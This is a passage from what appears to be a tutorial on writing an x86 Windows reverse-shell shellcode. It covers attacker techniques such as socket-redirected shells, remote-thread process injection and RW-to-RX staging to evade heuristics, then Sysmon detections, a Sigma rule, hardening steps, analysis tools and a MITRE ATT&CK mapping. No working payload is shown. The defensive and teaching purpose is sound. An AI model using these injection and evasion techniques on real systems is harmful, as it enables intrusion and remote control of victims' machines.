STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RWX → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP from `cmd.exe` or a non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	`GrantedAccess` to injected memory; `CallTrace` containing `UNKNOWN`
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls — Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
Det

Archive

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

1. From x86 to x64: What Actually Changed

2. The Microsoft x64 ABI Deep-Dive

Volatile vs Non-Volatile Registers

Side-by-Side: x86 Push vs x64 Register Load

3. Shadow Space: Why, What, and Where

4. Stack Alignment in Practice

5. Position-Independent Code Fundamentals

6. PEB Walking: Finding kernel32.dll Without Imports

7. Parsing the Export Address Table

8. Null-Byte and Bad-Character Avoidance

9. Shellcode Skeleton: Putting It Together

10. Common Attacker Techniques

11. Defensive Strategies & Detection

12. Tools for x64 Shellcode Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

1. What Is Shellcode? Constraints and Goals

2. x86 Calling Conventions and Stack Mechanics

3. The PEB Walk: Finding kernel32.dll Without Imports

4. Export Table Parsing: Resolving GetProcAddress

5. Bootstrapping Further API Resolution

6. Winsock Initialisation and Socket Creation

7. Spawning cmd.exe Over the Socket

8. Null-Byte Elimination and Bad-Character Audit

9. Testing and Verification

10. Common Attacker Techniques

11. Defensive Strategies and Detection

12. Tools for Shellcode Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References